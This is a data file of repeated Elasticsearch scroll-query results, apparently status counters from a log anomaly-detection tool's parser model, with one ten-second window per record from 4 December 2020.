{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"RzPuLXYBIkOurnXXeoh6","_score":1.0,"_source":{"FromTime":1.607088362206958E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":13,"/parser/model/type_str":2781,"/parser/model/php":0,"/parser/model/status_code":6,"/parser/model/host":5,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:12.243Z","ToTime":1.607088372207032E9,"fromtimestamp":"2020-12-04T13:26:02.206Z","totimestamp":"2020-12-04T13:26:12.207Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"TTPuLXYBIkOurnXXoojy","_score":1.0,"_source":{"FromTime":1.607088372563724E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":27,"/parser/model/type_str":2015,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:22.602Z","ToTime":1.607088382563822E9,"fromtimestamp":"2020-12-04T13:26:12.563Z","totimestamp":"2020-12-04T13:26:22.563Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"UTPuLXYBIkOurnXXyoiq","_score":1.0,"_source":{"FromTime":1.607088382723041E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":19,"/parser/model/type_str":618,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:32.771Z","ToTime":1.607088392723119E9,"fromtimestamp":"2020-12-04T13:26:22.723Z","totimestamp":"2020-12-04T13:26:32.723Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"VTPuLXYBIkOurnXX8Yjy","_score":1.0,"_source":{"FromTime":1.607088392788693E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":4,"/parser/model/type_str":151,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:42.826Z","ToTime":1.607088402788764E9,"fromtimestamp":"2020-12-04T13:26:32.788Z","totimestamp":"2020-12-04T13:26:42.788Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"WzPvLXYBIkOurnXXGYho","_score":1.0,"_source":{"FromTime":1.607088402876697E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":319,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:52.928Z","ToTime":1.607088412876761E9,"fromtimestamp":"2020-12-04T13:26:42.876Z","totimestamp":"2020-12-04T13:26:52.876Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"YDPvLXYBIkOurnXXQYhb","_score":1.0,"_source":{"FromTime":1.607088413096821E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":1141,"/parser/model/php":0,"/parser/model/status_code":4,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:03.155Z","ToTime":1.607088423096905E9,"fromtimestamp":"2020-12-04T13:26:53.096Z","totimestamp":"2020-12-04T13:27:03.096Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ZTPvLXYBIkOurnXXaYhw","_score":1.0,"_source":{"FromTime":1.607088423360947E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":27,"/parser/model/type_str":1073,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:13.417Z","ToTime":1.607088433361018E9,"fromtimestamp":"2020-12-04T13:27:03.360Z","totimestamp":"2020-12-04T13:27:13.361Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ajPvLXYBIkOurnXXkYhn","_score":1.0,"_source":{"FromTime":1.607088433607134E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":19,"/parser/model/type_str":988,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:23.648Z","ToTime":1.607088443607235E9,"fromtimestamp":"2020-12-04T13:27:13.607Z","totimestamp":"2020-12-04T13:27:23.607Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"bzPvLXYBIkOurnXXuojy","_score":1.0,"_source":{"FromTime":1.607088444216048E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":14,"/parser/model/type_str":3588,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:34.283Z","ToTime":1.607088454216143E9,"fromtimestamp":"2020-12-04T13:27:24.216Z","totimestamp":"2020-12-04T13:27:34.216Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"czPvLXYBIkOurnXX4ogb","_score":1.0,"_source":{"FromTime":1.607088454263898E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":103,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:44.308Z","ToTime":1.607088464264148E9,"fromtimestamp":"2020-12-04T13:27:34.263Z","totimestamp":"2020-12-04T13:27:44.264Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"eDPwLXYBIkOurnXXDIhj","_score":1.0,"_source":{"FromTime":1.607088465094996E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":26,"/parser/model/type_str":4659,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:55.132Z","ToTime":1.607088475095059E9,"fromtimestamp":"2020-12-04T13:27:45.094Z","totimestamp":"2020-12-04T13:27:55.095Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"fjPwLXYBIkOurnXXM4jZ","_score":1.0,"_source":{"FromTime":1.607088475178856E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":275,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:05.234Z","ToTime":1.607088485178946E9,"fromtimestamp":"2020-12-04T13:27:55.178Z","totimestamp":"2020-12-04T13:28:05.178Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"gjPwLXYBIkOurnXXW4ic","_score":1.0,"_source":{"FromTime":1.607088485375105E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":8,"/parser/model/type_str":1029,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:15.413Z","ToTime":1.607088495375182E9,"fromtimestamp":"2020-12-04T13:28:05.375Z","totimestamp":"2020-12-04T13:28:15.375Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"iDPwLXYBIkOurnXXg4jt","_score":1.0,"_source":{"FromTime":1.607088495696157E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":17,"/parser/model/type_str":1714,"/parser/model/php":0,"/parser/model/status_code":4,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:25.734Z","ToTime":1.607088505696266E9,"fromtimestamp":"2020-12-04T13:28:15.696Z","totimestamp":"2020-12-04T13:28:25.696Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"jDPwLXYBIkOurnXXrIho","_score":1.0,"_source":{"FromTime":1.607088506059213E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":2004,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:36.097Z","ToTime":1.607088516059322E9,"fromtimestamp":"2020-12-04T13:28:26.059Z","totimestamp":"2020-12-04T13:28:36.059Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"kDPwLXYBIkOurnXX04iY","_score":1.0,"_source":{"FromTime":1.607088516083463E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:46.128Z","ToTime":1.607088526083539E9,"fromtimestamp":"2020-12-04T13:28:36.083Z","totimestamp":"2020-12-04T13:28:46.083Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ljPwLXYBIkOurnXX-4gg","_score":1.0,"_source":{"FromTime":1.607088526182068E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":4,"/parser/model/type_str":399,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:56.248Z","ToTime":1.607088536182151E9,"fromtimestamp":"2020-12-04T13:28:46.182Z","totimestamp":"2020-12-04T13:28:56.182Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"mzPxLXYBIkOurnXXJIjl","_score":1.0,"_source":{"FromTime":1.60708853690535E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":12,"/parser/model/type_str":3908,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:06.942Z","ToTime":1.607088546905412E9,"fromtimestamp":"2020-12-04T13:28:56.905Z","totimestamp":"2020-12-04T13:29:06.905Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"oDPxLXYBIkOurnXXTYjD","_score":1.0,"_source":{"FromTime":1.607088547363252E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":9,"/parser/model/type_str":2612,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:17.404Z","ToTime":1.60708855736333E9,"fromtimestamp":"2020-12-04T13:29:07.363Z","totimestamp":"2020-12-04T13:29:17.363Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"pTPxLXYBIkOurnXXdYjw","_score":1.0,"_source":{"FromTime":1.607088557644684E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":18,"/parser/model/type_str":1351,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:27.689Z","ToTime":1.607088567644748E9,"fromtimestamp":"2020-12-04T13:29:17.644Z","totimestamp":"2020-12-04T13:29:27.644Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"qjPxLXYBIkOurnXXnYh6","_score":1.0,"_source":{"FromTime":1.607088567768974E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":450,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:37.811Z","ToTime":1.607088577769054E9,"fromtimestamp":"2020-12-04T13:29:27.768Z","totimestamp":"2020-12-04T13:29:37.769Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"rjPxLXYBIkOurnXXxog0","_score":1.0,"_source":{"FromTime":1.607088578197576E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":14,"/parser/model/type_str":1876,"/parser/model/php":0,"/parser/model/status_code":13,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:48.237Z","ToTime":1.607088588197668E9,"fromtimestamp":"2020-12-04T13:29:38.197Z","totimestamp":"2020-12-04T13:29:48.197Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"tDPxLXYBIkOurnXX7Yjs","_score":1.0,"_source":{"FromTime":1.607088588366563E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":20,"/parser/model/type_str":750,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:58.405Z","ToTime":1.607088598366688E9,"fromtimestamp":"2020-12-04T13:29:48.366Z","totimestamp":"2020-12-04T13:29:58.366Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"uTPyLXYBIkOurnXXFogk","_score":1.0,"_source":{"FromTime":1.607088598649987E9,"StatusInfo":{"/parser/model/classification":1,"/parser/model/event_type_str":18,"/parser/model/type_str":1400,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:08.701Z","ToTime":1.607088608650065E9,"fromtimestamp":"2020-12-04T13:29:58.649Z","totimestamp":"2020-12-04T13:30:08.650Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"vTPyLXYBIkOurnXXPoh2","_score":1.0,"_source":{"FromTime":1.607088608978295E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":87,"/parser/model/type_str":7140,"/parser/model/php":0,"/parser/model/status_code":36,"/parser/model/host":6,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:19.023Z","ToTime":1.60708861897837E9,"fromtimestamp":"2020-12-04T13:30:08.978Z","totimestamp":"2020-12-04T13:30:18.978Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"wzPyLXYBIkOurnXXZohS","_score":1.0,"_source":{"FromTime":1.607088619188115E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":18,"/parser/model/type_str":948,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:29.226Z","ToTime":1.607088629188182E9,"fromtimestamp":"2020-12-04T13:30:19.188Z","totimestamp":"2020-12-04T13:30:29.188Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"xzPyLXYBIkOurnXXj4j4","_score":1.0,"_source":{"FromTime":1.607088629851852E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":33,"/parser/model/type_str":3427,"/parser/model/php":0,"/parser/model/status_code":7,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:39.889Z","ToTime":1.607088639851962E9,"fromtimestamp":"2020-12-04T13:30:29.851Z","totimestamp":"2020-12-04T13:30:39.851Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"zDPyLXYBIkOurnXXuIjH","_score":1.0,"_source":{"FromTime":1.607088640299281E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":10,"/parser/model/type_str":2606,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:50.336Z","ToTime":1.607088650299357E9,"fromtimestamp":"2020-12-04T13:30:40.299Z","totimestamp":"2020-12-04T13:30:50.299Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"0TPyLXYBIkOurnXX4Iip","_score":1.0,"_source":{"FromTime":1.607088650508702E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":1037,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:00.546Z","ToTime":1.607088660508778E9,"fromtimestamp":"2020-12-04T13:30:50.508Z","totimestamp":"2020-12-04T13:31:00.508Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"1zPzLXYBIkOurnXXCIiC","_score":1.0,"_source":{"FromTime":1.607088660705171E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":16,"/parser/model/type_str":918,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:10.746Z","ToTime":1.607088670705239E9,"fromtimestamp":"2020-12-04T13:31:00.705Z","totimestamp":"2020-12-04T13:31:10.705Z","version":"1"}}]}} 